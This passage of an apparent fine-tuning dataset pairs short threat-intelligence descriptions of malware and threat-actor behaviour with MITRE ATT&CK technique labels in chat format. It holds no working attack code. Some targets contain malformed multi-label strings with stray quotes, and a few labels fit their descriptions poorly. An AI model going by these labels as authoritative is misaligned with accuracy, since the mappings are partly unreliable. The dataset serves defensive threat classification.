- "role": "user",
- "content": "Proxysvc collects the network adapter information and domain/username information based on current remote sessions."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Web shells are heavily relied on for nearly all stages of the attack lifecycle"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used Empire to gather various local system information."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gathering system information and sending it to the control server. The system information gathered from the endpoint includes: MAC address of the endpoint Computer Name Product name from HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName This information is concatenated into a single string in the format: “MAC_Address||ComputerName||ProductName” and is sent to the control server - MAC address of the endpoint - Computer Name - Product name from HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName - This information is concatenated into a single string in the format: “MAC_Address||ComputerName||ProductName” and is sent to the control server - Recording HTTP requests from the control server to the temporary file prx in the implant’s install directory with the current system timestamp"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Zip archive is encrypted with an unknown password, but we know it contains two files named joboffer.chm and thumb.db. The joboffer.chm file is a compiled HTML file that we believe loads and executes the ‘thumb.db’ file as a payload, but we cannot be absolutely sure as we do not have the password required to extract the files from the archive"
- },
- {
- "role": "assistant",
- "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LitePower can send collected data, including screenshots, over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the payload is successfully executed, it will proceed to copy files to the following locations: C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe C:\\ProgramData\\ManagerApp\\15b937.cab C:\\ProgramData\\ManagerApp\\install.cab C:\\ProgramData\\ManagerApp\\msvcr90.dll C:\\ProgramData\\ManagerApp\\d3d9.dll The “AdapterTroubleshooter.exe” file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The “d3d9.dll” file is malicious and is loaded into memory by the legit binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers using Comnie are leveraging malicious macros that initially hide decoy documents and shows them when the victim enables macros"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST remained dormant after initial access for a period of up to two weeks."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert can use multiple custom routines to decrypt strings prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches for files on local drives based on a predefined list of file extensions."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can identify the username of the infected user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.) The implants covered in this research establish a permanent presence on the victim’s system once the PowerShell implant is executed"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the string is present, the malware executes the command RunDll32.exe"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, this command extracted, decrypted, and executed the PowerShell backdoor payload stored in the HiveUploadTask text property of the RacTask class"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has staged malware and malicious files on compromised web servers, GitHub, and Google Drive."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used PowerShell to add and delete rules in the Windows firewall."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Action RAT's commands, strings, and domains can be Base64 encoded within the payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun has decrypted itself using a single-byte XOR scheme. Additionally, Rising Sun can decrypt its configuration data at runtime."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has the ability to take screen captures."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADFLICK can decode shellcode using a custom rotating XOR cipher."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. Based on the identified targets, CTU researchers assess with low confidence that a Russian government-sponsored threat group may be responsible for this campaign. Third-party researchers attribute this campaign to the Russia-based IRON RITUAL threat group (also known as NOBELIUM and APT29). IRON RITUAL has been linked to the SUNBURST malware used in the SolarWinds supply chain attack"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Sharpshooter, additional payloads were downloaded after a target was infected with a first-stage downloader."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill has looked in the registry to find the default browser path."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This function converts the given domain to “backdoor”, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor"
- },
- {
- "role": "assistant",
- "content": "T1484 - Domain or Tenant Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used RDP to log in and move laterally in the target environment."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has a command to create, set, copy, or delete a specified Registry key or value."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE has the ability to collect the IP address of an infected host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Spark has used HTTP POST requests to communicate with its C2 server to receive commands."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AdFind has the ability to query Active Directory for computers."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can upload and download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has a command to disable routing and the Firewall on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JCry has used VBS scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet uses the SetSecurityDescriptorDacl API to reduce object integrity levels."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has lured victims into opening malicious files containing malware."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PsExec can be used to download or upload a file over a network share."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint has used a malicious shim database to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.011 - Event Triggered Execution: Application Shimming"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A keylogging tool used by APT3 gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockBit 2.0 enumerates system information such as hostname, shares, and domain information"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used WinRAR and 7-Zip to compress an archive stolen data."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FYAnti has used ConfuserEx to pack its .NET module."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Putty Secure Copy Client (PSCP) to transfer data."
- },
- {
- "role": "assistant",
- "content": "T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Given their capability and sophistication, it is unlikely that IRON RITUAL's intrusions will leave sufficient artifacts to allow researchers to associate their activities with previous or future Russian cyber espionage operations. The group has used malware including the SUNBURST (also known as Solorigate) backdoor and in-memory Cobalt Strike delivered using the TEARDROP and RAINDROP loaders. CTU researchers assess with high confidence that IRON RITUAL's intent is long term, covert access to networks of interest for the purposes of espionage and data theft.ToolsTaegis™ XDR Adversary Software Coverage Tool"
- },
- {
- "role": "assistant",
- "content": "T1550 - Use Alternate Authentication Material"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Catchamas collects keystrokes from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "network traffic communicates over common ports like 80, 443, or 1433."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The “Excel” command receives another stage of the PowerShell code, saves it in “c:\\programdata\\a.ps1” and then asks Excel to execute this PowerShell script via DDE"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can connect to and disable the Symantec server on the victim's network."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can load a DLL using the LoadLibrary API."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses VBScripts and batch scripts."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has been spread through e-mail campaigns with malicious links."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We have observed the following capabilities of this payload: Get drive information Read files Write files Delete files Move files Spawn processes Create directories Reaver TCP Payload The malicious CPL payload of Reaver has the following three exported functions: ServiceMain CPlApplet DllEntryPoint When the malware is initially loaded, DllEntryPoint will be called, which in turn will call a function that is responsible for decompressing a blob of data"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1070.004 - Indicator Removal on Host: File Deletion', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie encrypts command and control communications with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Last but not least, the malware creates an id, in the same way as seen in previous Zebrocy binaries. It retrieves the UserName via the GetUserNameW Windows API and prepends the volume serial number of the C:\\ drive"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has collected a list of running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron can store email data in files and directories specified in its configuration, such as \"C:\\Windows\\ServiceProfiles\\NetworkService\\appdata\\Local\\Temp\\\"."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may collect local group information by running \"net localgroup administrators\" or a series of other commands on a victim."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can use Regsvr32 to execute additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "makes modifications to open-source scripts from GitHub and executes them on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There are 2 ways by which Linux/Ebury can choose a server where the DNS packets are sent. The second method uses an algorithm to generate a domain name dynamically. This domain name will be queried for its A and TXT records. The TXT record will be used to verify that it is under the control of the operators using public key cryptography. Details about the domain generation algorithm and the verification processed will be published later"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use a custom command and control protocol that can be encapsulated in DNS. All protocols use their standard assigned ports."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "will attempt to detect if the infected host is configured to a proxy. If so, will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used Mimikatz to dump certificates and private keys from the Windows certificate store."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the keychains on the system."
- },
- {
- "role": "assistant",
- "content": "T1555.001 - Credentials from Password Stores: Keychain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access."
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team have used previously acquired legitimate credentials prior to attacks."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
